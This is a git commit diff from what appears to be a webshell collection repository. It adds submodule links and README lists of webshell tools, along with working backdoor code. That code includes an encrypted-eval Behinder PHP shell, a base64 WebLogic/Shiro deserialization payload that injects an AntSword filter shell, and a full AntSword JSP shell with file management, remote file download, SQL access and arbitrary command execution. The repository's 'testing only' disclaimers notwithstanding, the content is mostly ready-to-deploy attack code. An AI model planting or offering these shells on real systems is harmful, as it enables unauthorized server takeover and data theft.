Update README.md

add create_webshell_with_py.py @pureqh ：💯
Create webshell from：https://mp.weixin.qq.com/s/s0piu9qU8oq6M1qAZCyI4g github： https://github.com/pureqh/webshell author: pureqh
2025-12-09 14:11:30 +00:00 · 2021-01-04 21:55:41 +08:00 · 2021-01-04 21:54:14 +08:00 · 2021-01-04 21:50:18 +08:00 · 2021-01-04 21:47:58 +08:00 · 2020-12-28 22:15:54 +08:00
83 changed files with 82781 additions and 88 deletions
--- a/.gitmodules
+++ b/.gitmodules
@@ -0,0 +1,60 @@
 [submodule "xl7dev/WebShell"]
 	path = xl7dev/WebShell
 	url = https://github.com/xl7dev/WebShell
 [submodule "JohnTroony/php-webshells"]
 	path = JohnTroony/php-webshells
 	url = https://github.com/JohnTroony/php-webshells
 [submodule "BlackArch/webshells"]
 	path = BlackArch/webshells
 	url = https://github.com/BlackArch/webshells
 [submodule "LandGrey/webshell-detect-bypass"]
 	path = LandGrey/webshell-detect-bypass
 	url = https://github.com/LandGrey/webshell-detect-bypass
 [submodule "JoyChou93/webshell"]
 	path = JoyChou93/webshell
 	url = https://github.com/JoyChou93/webshell
 [submodule "bartblaze/PHP-backdoors"]
 	path = bartblaze/PHP-backdoors
 	url = https://github.com/bartblaze/PHP-backdoors
 [submodule "WangYihang/Webshell-Sniper"]
 	path = WangYihang/Webshell-Sniper
 	url = https://github.com/WangYihang/Webshell-Sniper
 [submodule "threedr3am/JSP-Webshells"]
 	path = threedr3am/JSP-Webshells
 	url = https://github.com/threedr3am/JSP-Webshells
 [submodule "DeEpinGh0st/PHP-bypass-collection"]
 	path = DeEpinGh0st/PHP-bypass-collection
 	url = https://github.com/DeEpinGh0st/PHP-bypass-collection
 [submodule "lcatro/PHP-WebShell-Bypass-WAF"]
 	path = lcatro/PHP-WebShell-Bypass-WAF
 	url = https://github.com/lcatro/PHP-WebShell-Bypass-WAF
 [submodule "ysrc/webshell-sample"]
 	path = ysrc/webshell-sample
 	url = https://github.com/ysrc/webshell-sample
 [submodule "tanjiti/webshellSample"]
 	path = tanjiti/webshellSample
 	url = https://github.com/tanjiti/webshellSample
 [submodule "webshellpub/awsome-webshell"]
 	path = webshellpub/awsome-webshell
 	url = https://github.com/webshellpub/awsome-webshell
 [submodule "tdifg/WebShell"]
 	path = tdifg/WebShell
 	url = https://github.com/tdifg/WebShell
 [submodule "malwares/WebShell"]
 	path = malwares/WebShell
 	url = https://github.com/malwares/WebShell
 [submodule "lhlsec/webshell"]
 	path = lhlsec/webshell
 	url = https://github.com/lhlsec/webshell
 [submodule "oneoneplus/webshell"]
 	path = oneoneplus/webshell
 	url = https://github.com/oneoneplus/webshell
 [submodule "vnhacker1337/Webshell"]
 	path = vnhacker1337/Webshell
 	url = https://github.com/vnhacker1337/Webshell
 [submodule "backlion/webshell"]
 	path = backlion/webshell
 	url = https://github.com/backlion/webshell
 [submodule "AntSwordProject/AwesomeScript"]
 	path = AntSwordProject/AwesomeScript
 	url = https://github.com/AntSwordProject/AwesomeScript
--- a/AntSwordProject/AwesomeScript
+++ b/AntSwordProject/AwesomeScript
--- a/Behinder/Behinder_v3.0_Beta_1.zip
+++ b/Behinder/Behinder_v3.0_Beta_1.zip
--- a/Behinder/shell2020-12-06.php
+++ b/Behinder/shell2020-12-06.php
@@ -0,0 +1,26 @@
 <?php
@error_reporting(0);
 session_start();
 $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
 $_SESSION['k']=$key;
 $f=explode("|",base64_decode("ZmlsZV9nZXRfY29udGVudHN8YmFzZTY0X2RlY29kZXxwaHA6Ly9pbnB1dA=="));
 $post=["bie"=>$f[0](end($f))];
 $post=$post["bie"];
 if(!extension_loaded('openssl'))
 {
 $post=$f[1]($post."");
 for($i=0;$i<strlen($post);$i++) {
  $post[$i] = $post[$i] xor $key[$i+1&15];
 }
 }
 else
 {
 $post=openssl_decrypt($post, "AES128", $key);
 }
 $arr=explode('|',$post);
 $func=$arr[0];
 $params=$arr[1];
 class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
 ?>
--- a/BlackArch/webshells
+++ b/BlackArch/webshells
--- a/1
+++ b/1
@@ -1 +0,0 @@
 shell.endp.top
--- a/DeEpinGh0st/PHP-bypass-collection
+++ b/DeEpinGh0st/PHP-bypass-collection
--- a/Godzilla/Godzilla-BypassOpenRasp.jar
+++ b/Godzilla/Godzilla-BypassOpenRasp.jar
--- a/Godzilla/gesila.7z
+++ b/Godzilla/gesila.7z
--- a/JohnTroony/php-webshells
+++ b/JohnTroony/php-webshells
--- a/JoyChou93/webshell
+++ b/JoyChou93/webshell
--- a/LandGrey/webshell-detect-bypass
+++ b/LandGrey/webshell-detect-bypass
--- a/README.md
+++ b/README.md
@@ -1,5 +1,5 @@
-webshell
+# webshell | [English](https://github.com/tennc/webshell/blob/master/README_EN.md)
-========
+
 这是一个webshell收集项目
 送人玫瑰，手有余香，如果各位下载了本项目，也请您能提交shell
@@ -23,10 +23,11 @@
 > 2. 免杀webshell无限生成工具
 > 3. 免杀webshell无限生成工具(免杀一句话生成|免杀D盾|免杀安全狗护卫神河马查杀等一切waf)
 > 4. Author : yzddmr6
-> 5. 请自行鉴别
+> 5. https://github.com/pureqh/webshell
 > 6. 请自行鉴别后门
-> ### other webshell project (old)
+> ### other webshell project (update 2020-09-14)
 > 1. [xl7dev/WebShell](https://github.com/xl7dev/WebShell)
 > 2. [JohnTroony/php-webshells](https://github.com/JohnTroony/php-webshells)
 > 3. [BlackArch/webshells](https://github.com/BlackArch/webshells)
@@ -34,20 +35,34 @@
 > 5. [JoyChou93/webshell](https://github.com/JoyChou93/webshell)
 > 6. [bartblaze/PHP-backdoors](https://github.com/bartblaze/PHP-backdoors)
 > 7. [WangYihang/Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper)
 > 8. [threedr3am/JSP-Webshells](https://github.com/threedr3am/JSP-Webshells)
 > 9. [DeEpinGh0st/PHP-bypass-collection](https://github.com/DeEpinGh0st/PHP-bypass-collection)
 > 10. [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF)
 > 11. [ysrc/webshell-sample](https://github.com/ysrc/webshell-sample)
 > 12. [tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
 > 13. [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell)
 > 14. [tdifg/WebShell](https://github.com/tdifg/WebShell)
 > 15. [malwares/WebShell](https://github.com/malwares/WebShell)
 > 16. [lhlsec/webshell](https://github.com/lhlsec/webshell)
 > 17. [oneoneplus/webshell](https://github.com/oneoneplus/webshell)
 > 18. [vnhacker1337/Webshell](https://github.com/vnhacker1337/Webshell)
 > 19. [backlion/webshell](https://github.com/backlion/webshell)
 > ### 顺便在推一波网站管理工具
 > 1. 中国菜刀
 > 2. Cknife
-> 3. Altman
+> 3. [Altman](https://github.com/keepwn/Altman)
 > 4. xise
-> 5. Weevely
+> 5. [Weevely](https://github.com/epinna/weevely3)
-> 6. quasibot
+> 6. [quasibot](https://github.com/Smaash/quasibot)
-> 7. Webshell-Sniper
+> 7. [Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper)
-> 8. 蚁剑
+> 8. [蚁剑 antSword](https://github.com/AntSwordProject/antSword)
-> 9. 冰蝎
+> 9. [冰蝎 Behinder](https://github.com/rebeyond/Behinder)
-> 10. webacoo
+> 10. [webacoo](https://github.com/anestisb/WeBaCoo)
-> 11. 以上排名不分先后
+> 11. [哥斯拉 Godzilla](https://github.com/BeichenDream/Godzilla)
 > 12. [PhpSploit](https://github.com/nil0x42/phpsploit)
 > 13. 以上排名不分先后
--- a/README_EN.md
+++ b/README_EN.md
@@ -0,0 +1,82 @@
 webshell
 [简体中文](https://github.com/tennc/webshell/blob/master/README.md)
 ========
 This is a webshell collection project
 *Give someone a rose, there is a fragrance in your hand*  
 if you download this project, please also submit a shell
 This project covers various common scripts
 Such as: asp, aspx, php, jsp, pl, py
 If you submit a webshell, please do not change the name and password
 Note: There is no guarantee whether there could be a backdoor in a shell, but I will never add a backdoor deliberately when uploading by myself
 Please don’t add a backdoor if you submit
 If you find a backdoor code, please create an issue immediately!
 The tools provided by this project are forbidden to engage in illegal activities. This project is for testing purposes only. All the consequences caused by it have nothing to do with me.
 > ### Expanding a project 
 > 1. [webshell-venom](https://github.com/yzddmr6/webshell-venom)
 > 2. Kill-free webshell unlimited generation tool
 > 3. Kill-free webshell unlimited generation tool (Kill-free one sentence generation|Kill-free D shield|Kill-free security dog guard God Hippo check and kill everything waf)
 > 4. Author : yzddmr6
 > 5. Please identify yourself
 > ### other webshell project (update 2020-09-14)
 > 1. [xl7dev/WebShell](https://github.com/xl7dev/WebShell)
 > 2. [JohnTroony/php-webshells](https://github.com/JohnTroony/php-webshells)
 > 3. [BlackArch/webshells](https://github.com/BlackArch/webshells)
 > 4. [LandGrey/webshell-detect-bypass](https://github.com/LandGrey/webshell-detect-bypass)
 > 5. [JoyChou93/webshell](https://github.com/JoyChou93/webshell)
 > 6. [bartblaze/PHP-backdoors](https://github.com/bartblaze/PHP-backdoors)
 > 7. [WangYihang/Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper)
 > 8. [threedr3am/JSP-Webshells](https://github.com/threedr3am/JSP-Webshells)
 > 9. [DeEpinGh0st/PHP-bypass-collection](https://github.com/DeEpinGh0st/PHP-bypass-collection)
 > 10. [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF)
 > 11. [ysrc/webshell-sample](https://github.com/ysrc/webshell-sample)
 > 12. [tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
 > 13. [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell)
 > 14. [tdifg/WebShell](https://github.com/tdifg/WebShell)
 > 15. [malwares/WebShell](https://github.com/malwares/WebShell)
 > 16. [lhlsec/webshell](https://github.com/lhlsec/webshell)
 > 17. [oneoneplus/webshell](https://github.com/oneoneplus/webshell)
 > 18. [vnhacker1337/Webshell](https://github.com/vnhacker1337/Webshell)
 > 19. [backlion/webshell](https://github.com/backlion/webshell)
 > ### By the way, we are pushing a wave of website management tools
 > 1. Chinese Kitchen Knife
 > 2. Cknife
 > 3. [Altman](https://github.com/keepwn/Altman)
 > 4. xise
 > 5. [Weevely](https://github.com/epinna/weevely3)
 > 6. [quasibot](https://github.com/Smaash/quasibot)
 > 7. [Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper)
 > 8. [蚁剑 antSword](https://github.com/AntSwordProject/antSword)
 > 9. [冰蝎 Behinder](https://github.com/rebeyond/Behinder)
 > 10. [webacoo](https://github.com/anestisb/WeBaCoo)
 > 11. [哥斯拉 Godzilla](https://github.com/BeichenDream/Godzilla)
 > 12. [PhpSploit](https://github.com/nil0x42/phpsploit)
 > 13. The above rankings are in no particular order
 Author ：tennc
 http://tennc.github.io/webshell
 license : GPL v3
 ## Download link
 Check github releases. Latest:
 [https://github.com/tennc/webshell/releases](https://github.com/tennc/webshell/releases)
 ## Sponsored by Jetbrains
 ## <img src="https://raw.githubusercontent.com/tennc/webshell/master/jetbrains.png" width="400"> Thanks to [Jetbrains](https://www.jetbrains.com/?from=webshell)
--- a/WangYihang/Webshell-Sniper
+++ b/WangYihang/Webshell-Sniper
--- a/antSword-shells/WebLogic_Shiro.md
+++ b/antSword-shells/WebLogic_Shiro.md
@@ -0,0 +1,15 @@
 ``` java
 YWFhYWFhYWFhYWFhYWFhYW4WyDHgFb0DhQAQ46Kgw+r8soc6/b5FErU9nSlqEsyHJ8x4xnqm1ex86u/xBiUprKSOWmYZAMmwfWmzi9V1lvBG13cKgcZiHI6Kj0T69zzRdjvky4fgMZJy5IC1J5Dw8AFlea2PrRvslWyoPMxkYDXMCIQWOPYx4q6VXinkXP+3/hTU+VhQKzUdqbYj6w2DiQ6oqtZBYZdGD4YXq5YTrKpOHPyPex9EEvNxxZQGQcUgZD8+evRHXAcxCT/hTgsio2sGE7DkOB/PnnBhzm+1kJkEU6ePQoiD2GQA+lAVmLpQJEq4xlgg1HtVlQK7mCtSRU2vhroCHMtOFcQCz7u8yQ1hk0+da0IIf+QxsM0p78aWq8IYjk1wjzpxp8azJWvG0ao6ok9VdWXbJdC+c9yB5LySnNb7auijcGV54JODEx22BDsOVcN+vwyd3JBpfX+2KBur5jIIfc3kHRMRuJV9+LPoHDhoUVdUc5cismdzX2d0LJ9Ml+8l7LCAaenC2/GNgZJkzCpuZ/jvEfGVyCuLMK1KQM0eeW7beOojIcDXT6jrAn4Ys0gMThu05TWjQHM+fXDczE6Eb6dO5x9tOROFI0gcqzjmRage7xXM2xHykzej6CuiP6eJb+qKND244YgFN9gkAQqgkyscLcV0Ds6EldEct7uhzQfM1upktzWwsdrY1qVSmuMt1T8UzW/+hZoYgvxAh4F7jsSHuTPtoLoC36OK6PnooZUvKlmQtOCe05hIKpXoc9wXXh1EWJE5RXFrU34LMbsEjZH5e1GY8e9/xDxbRfNnBCfgpUH2rlPo0fUP0gdexpMLU9V/HDOBOxuQWLxRHvX3bpW3CF+cvYOJHtz9x6Y7Qa3NQxtkv1qrcddYXQdqO52sGjGvYCo6OyYsJm1vYnaqccVtsm/85VmCjAGu8QkP5tK3P8jr5K9pVdSEgAECTxYt/XRp/3baKCAPbLY1ibmR63y+0lBC+krW/p22CdpKq11r2ZxVVSEmaCBl4LgbYi1wk+rZFv1Io4CSr/R9PBFjlkvsCl2PSXC+VLA6YZt2d9u1F0uXC5VHhnTJaZ35lPBUTGT9BBvveDDW99CCmQa9htKNDwAsZnlyghFAPheH9N5J729NVrWXbrbUa1tl/Eh7rzA3SriFFZ9LhlGH68ksuCaUesi1+S0hh+aL7sXpKuxEVFK5yY1a3FHCjxeP1C29QAqgulzAJ5Lm6xjQ7Nb2lo5FfHMMO4kipou6gFlA5dhyholnB4wCzxy+V0UA5uY1kqxooLa5mUs+l5Xn8k+XWuhzZ/1OLLwlc5BEZ4qAdI77i4kkVhvr21lK5DoKhBMgl/5Sv+1k7TbgyTYa5Xvk1c7Sf0v7MCDeeSnFHElyLHW/LL7sgBXns4f9wy9tQWhafv3xqc5X+8ARY3QoP8bmV2AUpIeyWAvc1lS2Bf8juaQ6PKXTMPB5y6aTW2eDdCjDZLhrBj02qPt4A3l4uqBylZLSdeNFGSXrTPqiAADxGawk2TvKqRYn8oowS0SWeUngpR7GGGiqU/m8e3PUC/WepGQj0rdTFXqE5MJPd0a9BgQOew0uQfmKdbzstZr2j4on8lWYRmPLxpeooV7YvJL5mC3Xfo381OhOCEI5twD5MvXrUlSQpMH9+HISjWRxLzsC2njoXwiPbum39w==
 ```
 pass: alsdkj1l24wqasd123
 use: URLClassLoader -> tttt.jar -> InjectFilterShell static -> defineClass byte -> AntSwordFilterShell
 ![antshell](https://github.com/Y4er/WebLogic-Shiro-shell/raw/master/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.assets/antshell.gif)
 author:Y4er
 project:https://github.com/Y4er/WebLogic-Shiro-shell
--- a/antSword-shells/jsp_custom_script_for_oracle.jsp
+++ b/antSword-shells/jsp_custom_script_for_oracle.jsp
@@ -0,0 +1,525 @@
 <%--
             _   ____                       _
  __ _ _ __ | |_/ ___|_      _____  _ __ __| |
 / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
 | (_| | | | | |_ ___) \ V  V / (_) | | | (_| |
 \__,_|_| |_|\__|____/ \_/\_/ \___/|_|  \__,_|
 ———————————————————————————————————————————————
    AntSword JSP Custom Script for Oracle
    警告：
        此脚本仅供合法的渗透测试以及爱好者参考学习
         请勿用于非法用途，否则将追究其相关责任！
 ———————————————————————————————————————————————
 说明：
 1. AntSword >= v2.1.0
 2. 创建 Shell 时选择 custom 模式连接
 3. 数据库连接：
  oracle.jdbc.driver.OracleDriver
  jdbc:oracle:thin:@127.0.0.1:1521/test
  user
  password
  注意：以上是4行
 4. 本脚本中 encoder/decoder 与 AntSword 添加 Shell 时选择的 encoder/decoder 要一致，如果选择 default 则需要将值设置为空
 已知问题：
 1. 文件管理遇到中文文件名显示的问题
 ChangeLog:
  v1.8
    1. 修复由于decode函数与EC函数位置写反而导致的乱码问题
  v1.7
    1. 新增 AES 编码/解码 支持 (thx @Ch1ngg)
    2. 新增 Version, 直接访问不带任何参数会返回当前 shell 的版本号
  v1.6
    1. 新增 4 种解码器支持
  v1.5
    1. 修正 base64 编码器下连接数据库 characterEncoding 出错
  v1.4
    1. 修正 windows 下基础路径获取盘符会出现小写的情况
  v1.3
   1. 修正上传文件超过1M时的bug
   2. 修正weblogic war 包布署获取路径问题
   3. 修正文件中文字符问题
  Date: 2016/04/29 v1.2
   1. 修正修改包含结束tag的文件会出错的 bug
  Date: 2016/04/06 v1.1
   1. 修正下载文件参数设置错误
   2. 修正一些注释的细节
  Date: 2016/03/26 v1
   1. 文件系统 和 terminal 管理
   2. mysql 数据库支持
   3. 支持 base64 和 hex 编码
 --%>
 <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,javax.crypto.*,java.security.*,javax.crypto.spec.*" contentType="text/html;charset=UTF-8"%>
 <%!
 // #################################################################
    String Pwd = "ant";         //连接密码
    // 编码器
    String encoder = "";               // default (明文)
    // String encoder = "base64";      // base64
    // String encoder = "hex";         // hex(推荐)
    // String encoder = "aes";         // aes(加密方式见下文aes配置)
    // 解码器
    String decoder = "";               // default (明文)
    // String decoder = "base64";      // base64 中文正常
    // String decoder = "hex";         // hex 中文可能有问题
    // String decoder = "hex_base64";  // hex(base64) // 中文正常
    // String decoder = "aes_base64";  // aes(base64) (加密方式见下文aes配置)
    // 其它配置
    String cs = "UTF-8";                // 字符集编码
    String SessionKey = "CUSTOMSESSID"; // 自定义sessionkey id
    String RetS = "LT58";               // 数据起始分割符 base64
    String RetE = "fDwt";               // 数据结束分割符 base64
    // aes 加密配置项
    /*
    *  aes-128-cfb_zero_padding:
    *   - aes_mode: CFB
    *   - aes_padding: NoPadding
    *   - aes_keylen: 16
    *  aes-256-ecb_zero_padding:
    *   - aes_mode: ECB
    *   - aes_padding: NoPadding
    *   - aes_keylen: 32
    */
    // 注意: 以下4项为 encoder/decoder 共用
    // 如果需要请求和返回采用不同方式, 自行修改
    String aes_mode = "CFB";            // CBC|ECB|CFB|
    String aes_padding = "NoPadding";   // NoPadding|PKCS5Padding|PKCS7Padding
    int aes_keylen = 16;                // 16|32  // 16(AES-128) 32(AES-256)
    String aes_key_padding = "a";       // 获取到的 key 位数不够时填充字符
 // ################################################################
    String AesKey = "";
    String Version = "1.7";
    String EC(String s) throws Exception {
        if(encoder.equals("hex") || encoder == "hex") return s;
        return new String(s.getBytes(), cs);
    }
    String showDatabases(String encode, String conn) throws Exception {
        String sql = "SELECT USERNAME FROM ALL_USERS ORDER BY 1";
        String columnsep = "\t";
        String rowsep = "";
        return executeSQL(encode, conn, sql, columnsep, rowsep, false);
    }
    String showTables(String encode, String conn, String dbname) throws Exception {
        String sql = "SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='"+dbname+"' ORDER BY 1)";
        String columnsep = "\t";
        String rowsep = "";
        return executeSQL(encode, conn, sql, columnsep, rowsep, false);
    }
    String showColumns(String encode, String conn, String dbname, String table) throws Exception {
        String columnsep = "\t";
        String rowsep = "";
        String sql = "select * from " + dbname + "." + table + " WHERE ROWNUM=0";
        return executeSQL(encode, conn, sql, columnsep, rowsep, true);
    }
    String query(String encode, String conn, String sql) throws Exception {
        String columnsep = "\t|\t";
        String rowsep = "\r\n";
        return executeSQL(encode, conn, sql, columnsep, rowsep, true);
    }
    String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
            throws Exception {
        String ret = "";
        conn = (EC(conn));
        String[] x = conn.trim().replace("\r\n", "\n").split("\n");
        Class.forName(x[0].trim());
        String url = x[1];
        Connection c = DriverManager.getConnection(url,x[2],x[3]);
        Statement stmt = c.createStatement();
        ResultSet rs = stmt.executeQuery(sql);
        ResultSetMetaData rsmd = rs.getMetaData();
        if (needcoluname) {
            for (int i = 1; i <= rsmd.getColumnCount(); i++) {
                String columnName = rsmd.getColumnName(i);
                ret += columnName + columnsep;
            }
            ret += rowsep;
        }
        while (rs.next()) {
            for (int i = 1; i <= rsmd.getColumnCount(); i++) {
                String columnValue = rs.getString(i);
                ret += columnValue + columnsep;
            }
            ret += rowsep;
        }
        return ret;
    }
    String WwwRootPathCode(String d) throws Exception {
        String s = "";
        if (!d.substring(0, 1).equals("/")) {
            File[] roots = File.listRoots();
            for (int i = 0; i < roots.length; i++) {
                s += roots[i].toString().substring(0, 2) + "";
            }
        } else {
            s += "/";
        }
        return s;
    }
    String FileTreeCode(String dirPath) throws Exception {
        File oF = new File(dirPath), l[] = oF.listFiles();
        String s = "", sT, sQ, sF = "";
        java.util.Date dt;
        String fileCode=(String)System.getProperties().get("file.encoding");
        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        for (int i = 0; i < l.length; i++) {
            dt = new java.util.Date(l[i].lastModified());
            sT = fm.format(dt);
            sQ = l[i].canRead() ? "R" : "";
            sQ += l[i].canWrite() ? " W" : "";
            String nm = new String(l[i].getName().getBytes(fileCode), cs);
            if (l[i].isDirectory()) {
                s += nm + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
            } else {
                sF += nm + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
            }
        }
        s += sF;
        return new String(s.getBytes(fileCode), cs);
    }
    String ReadFileCode(String filePath) throws Exception {
        String l = "", s = "";
        BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(filePath)), cs));
        while ((l = br.readLine()) != null) {
            s += l + "\r\n";
        }
        br.close();
        return s;
    }
    String WriteFileCode(String filePath, String fileContext) throws Exception {
        String h = "0123456789ABCDEF";
        String fileHexContext = strtohexstr(fileContext);
        File f = new File(filePath);
        FileOutputStream os = new FileOutputStream(f);
        for (int i = 0; i < fileHexContext.length(); i += 2) {
            os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
        }
        os.close();
        return "1";
    }
    String DeleteFileOrDirCode(String fileOrDirPath) throws Exception {
        File f = new File(fileOrDirPath);
        if (f.isDirectory()) {
            File x[] = f.listFiles();
            for (int k = 0; k < x.length; k++) {
                if (!x[k].delete()) {
                    DeleteFileOrDirCode(x[k].getPath());
                }
            }
        }
        f.delete();
        return "1";
    }
    void DownloadFileCode(String filePath, HttpServletResponse r) throws Exception {
        int n;
        byte[] b = new byte[512];
        r.reset();
        ServletOutputStream os = r.getOutputStream();
        BufferedInputStream is = new BufferedInputStream(new FileInputStream(filePath));
        os.write(("->"+"|").getBytes(), 0, 3);
        while ((n = is.read(b, 0, 512)) != -1) {
            os.write(b, 0, n);
        }
        os.write(("|"+"<-").getBytes(), 0, 3);
        os.close();
        is.close();
    }
    String UploadFileCode(String savefilePath, String fileHexContext) throws Exception {
        String h = "0123456789ABCDEF";
        File f = new File(savefilePath);
        f.createNewFile();
        FileOutputStream os = new FileOutputStream(f,true);
        for (int i = 0; i < fileHexContext.length(); i += 2) {
            os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
        }
        os.close();
        return "1";
    }
    String CopyFileOrDirCode(String sourceFilePath, String targetFilePath) throws Exception {
        File sf = new File(sourceFilePath), df = new File(targetFilePath);
        if (sf.isDirectory()) {
            if (!df.exists()) {
                df.mkdir();
            }
            File z[] = sf.listFiles();
            for (int j = 0; j < z.length; j++) {
                CopyFileOrDirCode(sourceFilePath + "/" + z[j].getName(), targetFilePath + "/" + z[j].getName());
            }
        } else {
            FileInputStream is = new FileInputStream(sf);
            FileOutputStream os = new FileOutputStream(df);
            int n;
            byte[] b = new byte[1024];
            while ((n = is.read(b, 0, 1024)) != -1) {
                os.write(b, 0, n);
            }
            is.close();
            os.close();
        }
        return "1";
    }
    String RenameFileOrDirCode(String oldName, String newName) throws Exception {
        File sf = new File(oldName), df = new File(newName);
        sf.renameTo(df);
        return "1";
    }
    String CreateDirCode(String dirPath) throws Exception {
        File f = new File(dirPath);
        f.mkdir();
        return "1";
    }
    String ModifyFileOrDirTimeCode(String fileOrDirPath, String aTime) throws Exception {
        File f = new File(fileOrDirPath);
        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        java.util.Date dt = fm.parse(aTime);
        f.setLastModified(dt.getTime());
        return "1";
    }
    String WgetCode(String urlPath, String saveFilePath) throws Exception {
        URL u = new URL(urlPath);
        int n = 0;
        FileOutputStream os = new FileOutputStream(saveFilePath);
        HttpURLConnection h = (HttpURLConnection) u.openConnection();
        InputStream is = h.getInputStream();
        byte[] b = new byte[512];
        while ((n = is.read(b)) != -1) {
            os.write(b, 0, n);
        }
        os.close();
        is.close();
        h.disconnect();
        return "1";
    }
    String SysInfoCode(HttpServletRequest r) throws Exception {
        String d = "";
        try {
            if(r.getSession().getServletContext().getRealPath("/") != null){
                d = r.getSession().getServletContext().getRealPath("/");
            }else{
                String cd = this.getClass().getResource("/").getPath();
                d = new File(cd).getParent();
            }
        } catch (Exception e) {
            String cd = this.getClass().getResource("/").getPath();
            d = new File(cd).getParent();
        }
        d = String.valueOf(d.charAt(0)).toUpperCase() + d.substring(1);
        String serverInfo = (String)System.getProperty("os.name");
        String separator = File.separator;
        String user = (String)System.getProperty("user.name");
        String driverlist = WwwRootPathCode(d);
        return d + "\t" + driverlist + "\t" + serverInfo + "\t" + user;
    }
    boolean isWin() {
        String osname = (String)System.getProperty("os.name");
        osname = osname.toLowerCase();
        if (osname.startsWith("win"))
            return true;
        return false;
    }
    String ExecuteCommandCode(String cmdPath, String command) throws Exception {
        StringBuffer sb = new StringBuffer("");
        String[] c = { cmdPath, !isWin() ? "-c" : "/c", command };
        Process p = Runtime.getRuntime().exec(c);
        CopyInputStream(p.getInputStream(), sb);
        CopyInputStream(p.getErrorStream(), sb);
        return sb.toString();
    }
    String getEncoding(String str) {
        String encode[] = new String[]{
                "UTF-8",
                "ISO-8859-1",
                "GB2312",
                "GBK",
                "GB18030",
                "Big5",
                "Unicode",
                "ASCII"
        };
        for (int i = 0; i < encode.length; i++){
            try {
                if (str.equals(new String(str.getBytes(encode[i]), encode[i]))) {
                    return encode[i];
                }
            } catch (Exception ex) {
            }
        }
        return "";
    }
    String strtohexstr(String fileContext)throws Exception{
        String h = "0123456789ABCDEF";
        byte[] bytes = fileContext.getBytes(cs);
        StringBuilder sb = new StringBuilder(bytes.length * 2);
        for (int i = 0; i < bytes.length; i++) {
            sb.append(h.charAt((bytes[i] & 0xf0) >> 4));
            sb.append(h.charAt((bytes[i] & 0x0f) >> 0));
        }
        String fileHexContext = sb.toString();
        return fileHexContext;
    }
    String asenc(String str, String decode) throws Exception{
        if(decode.equals("hex") || decode=="hex"){
            return strtohexstr(str);
        }else if(decode.equals("base64") || decode == "base64"){
            String sb = "";
            sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
            sb = encoder.encode(str.getBytes());
            return sb;
        }else if(decode.equals("hex_base64") || decode == "hex_base64"){
            return asenc(asenc(str, "base64"), "hex");
        }else if(decode.equals("aes_base64") || decode == "aes_base64"){
            String sb1 = "";
            sb1 = AesEncrypt(AesKey, asenc(str, "base64"));
            return sb1.replace("\r\n","");
        }
        return str;
    }
    String decode(String str) {
        byte[] bt = null;
        try {
            sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
            bt = decoder.decodeBuffer(str);
        } catch (IOException e) {
            e.printStackTrace();
        }
        return new String(bt);
    }
    String decode(String str, String encode) throws Exception{
        if(encode.equals("hex") || encode=="hex"){
            if(str=="null"||str.equals("null")){
                return "";
            }
            String hexString = "0123456789ABCDEF";
            str = str.toUpperCase();
            ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length()/2);
            String ss = "";
            for (int i = 0; i < str.length(); i += 2){
                ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ",";
                baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))));
            }
            return baos.toString(cs);
        }else if(encode.equals("base64") || encode == "base64"){
            byte[] bt = null;
            sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
            bt = decoder.decodeBuffer(str);
            return new String(bt,cs);
        }else if(encode.equals("aes") || encode == "aes") {
            String str1 = AesDecrypt(AesKey, str);
            return str1.trim();
        }
        return str;
    }
    String AesEncrypt(String key, String cleartext) throws Exception {
        IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes());
        SecretKeySpec keys = new SecretKeySpec(key.getBytes(), "AES");
        Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding));
        cipher.init(Cipher.ENCRYPT_MODE, keys, zeroIv);  
        byte[] encryptedData = cipher.doFinal(cleartext.getBytes("UTF-8"));
        sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
        String sb = encoder.encode(encryptedData);
        return sb;
    }
    String AesDecrypt(String key ,String encrypted) throws Exception {
        sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
        byte[] byteMi = decoder.decodeBuffer(encrypted);
        IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes());
        SecretKeySpec keys = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
        Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding));
        cipher.init(Cipher.DECRYPT_MODE, keys, zeroIv);
        byte[] decryptedData = cipher.doFinal(byteMi);
        return new String(decryptedData, "UTF-8");
    }
